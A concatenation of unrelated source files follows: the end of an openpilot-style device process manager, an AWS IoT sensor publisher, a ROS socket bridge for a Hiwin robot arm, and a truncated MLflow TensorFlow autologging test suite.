# subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("Killing " + name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
dongle_id_str = dongle_id.decode()
cloudlog.info("dongle id is " + dongle_id_str)
os.environ['DONGLE_ID'] = dongle_id_str
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id_str, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id_str)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
#--- manager thread --------------------------------------------
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
# this is closed software so it cannot run on a RPi
logger_dead = False
try:
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
except OSError:
# no worries, it is only logging
logger_dead = True
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
cloudlog.info("start pandad and boardd")
start_managed_process("pandad")
params = Params()
while 1:
# read thermal msg to check cpu temperature and free space
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
# if thermal msg is available, start all car_started processes
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check if pandad has finished and boardd is not running yet
# pandad is updating the panda module and needs to be finished before we can start boardd
# a process gives exit code 0 if it ended correctly
# exit code == None is process is still running
if 'pandad' in running and 'boardd' not in running:
if running['pandad'].exitcode == 0:
start_managed_process('boardd')
# check the status of all processes, did any of them die?
# and minimize number of logmessages
cloudMsg = "Running: "
for p in running:
cloudMsg = cloudMsg + " %s %s, " % (p, running[p])
# cloudlog.debug(" Running %s %s" % (p, running[p]))
cloudlog.info(cloudMsg)
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
# use pm command to list all available packages, not required on Rpi
try:
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
except FileNotFoundError:
# make empty list
dat = []
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
# cereal is capnp stuff for rpc calls to c++ and java
# subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def xstr(s):
return '' if s is None else str(s)
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
cloudlog.info('NOLOG=' + xstr(os.getenv("NOLOG")))
cloudlog.info('NOUPLOAD=' + xstr(os.getenv("NOUPLOAD")))
cloudlog.info('NOVISION=' + xstr(os.getenv("NOVISION")))
cloudlog.info('LEAN=' + xstr(os.getenv("LEAN")))
cloudlog.info('NOCONTROL=' + xstr(os.getenv("NOCONTROL")))
cloudlog.info('PASSIVE=' + xstr(os.getenv("PASSIVE")))
cloudlog.info('PREPAREONLY=' + xstr(os.getenv("PREPAREONLY")))
cloudlog.info('BASEDIR=' + xstr(os.getenv("BASEDIR")))
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process)
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("GeoFence") is None:
params.put("GeoFence", "")
if params.get("UploadWebsite") is None:
params.put("UploadWebsite", "")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
cloudlog.info('Try to start C executable Spinner=' + spinner_text)
# TODO: add try/
try:
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
except OSError:
cloudlog.info('C executable Spinner falied with OSError')
spinner_proc = False
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
cloudlog.info('Start main()')
main()
# manual exit because we are forked
sys.exit(0)
|
run.py
|
from aws_iot_client import AWSIOTClient
from sensor import Sensor
import time
from datetime import datetime
import threading
import json
from concurrent.futures import ProcessPoolExecutor as executor
from random import random
class Config:
def __init__(self, host, rootCA, cert, privkey, clientId, devices):
self.host = host
self.rootCA = rootCA
self.cert = cert
self.privkey = privkey
self.clientId = clientId
self.devices = devices
def connect(device):
lock = device.lock
print("{} lock: {}".format(device.deviceId, lock.locked()))
if not lock.locked():
with lock:
if not device.connected:
print('Attempt to connect to {}'.format(device.deviceId), flush=True)
device.connect()
def start_publish(devices, client):
while True:
data = []
for device in devices:
if not device.connected:
t = threading.Thread(target=connect, args=(device,))
t.start()
try:
data.append(device.get_data())
except Exception as e:
device.disconnect()
print(e)
payload = {
"clientId": client.config.clientId,
"datetime": datetime.now().replace(microsecond=0).isoformat(),
"status": "Deployed",
"members": data,
"lat": 38.5818756 + random()/4000,
"lng": -121.493181 + random()/4000
}
client.publish(payload)
time.sleep(0.2)
def main():
config_json = open('./config.json')
config = Config(**json.load(config_json))
client = AWSIOTClient(config)
devices = []
for info in config.devices:
device = Sensor(info['addr'], info['deviceId'])
devices.append(device)
start_publish(devices, client)
for t in threading.enumerate():
if t is not threading.current_thread():
t.join()
if __name__ == '__main__':
main()
|
HiwinRA605_socket_ros_test_20190625195933.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,point_data_flag,arm_mode_flag,speed_mode_flag,Socket_sent_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
test_tensorflow2_autolog.py
|
# pep8: disable=E501
import collections
import pytest
import sys
from packaging.version import Version
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
import mlflow.keras
from mlflow.utils.autologging_utils import BatchMetricsLogger, autologging_is_disabled
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
@pytest.fixture
def clear_tf_keras_imports():
"""
Simulates a state where `tensorflow` and `keras` are not imported by removing these
libraries from the `sys.modules` dictionary. This is useful for testing the interaction
between TensorFlow / Keras and the fluent `mlflow.autolog()` API because it will cause import
hooks to be re-triggered upon re-import after `mlflow.autolog()` is enabled.
"""
sys.modules.pop("tensorflow", None)
sys.modules.pop("keras", None)
@pytest.fixture(autouse=True)
def clear_fluent_autologging_import_hooks():
"""
Clears import hooks for MLflow fluent autologging (`mlflow.autolog()`) between tests
to ensure that interactions between fluent autologging and TensorFlow / tf.keras can
be tested successfully
"""
mlflow.utils.import_hooks._post_import_hooks.pop("tensorflow", None)
mlflow.utils.import_hooks._post_import_hooks.pop("keras", None)
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
def test_tf_keras_autolog_ends_auto_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
def test_tf_keras_autolog_persists_manually_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(random_train_data, random_one_hot_labels, initial_epoch):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=num_training_epochs, initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=1,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
def get_tf_keras_random_data_run_with_callback(
random_train_data, random_one_hot_labels, callback, restore_weights, patience, initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data, random_one_hot_labels, callback, restore_weights, patience, initial_epoch,
):
return get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback, initial_epoch):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
# In this test, the best epoch is always the first epoch because the early stopping callback
# never observes a loss improvement due to an extremely large `min_delta` value
assert restored_epoch == initial_epoch
assert "loss" in history.history
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check that MLflow has logged the metrics of the "best" model, in addition to per-epoch metrics
loss = history.history["loss"]
assert len(metric_history) == len(loss) + 1
steps, values = map(list, zip(*[(m.step, m.value) for m in metric_history]))
# Check that MLflow has logged the correct steps
assert steps == [*history.epoch, callback.stopped_epoch + 1]
# Check that MLflow has logged the correct metric values
np.testing.assert_allclose(values, [*loss, callback.best])
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback, restore_weights, patience, initial_epoch, random_train_data, random_one_hot_labels,
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert restored_epoch == initial_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
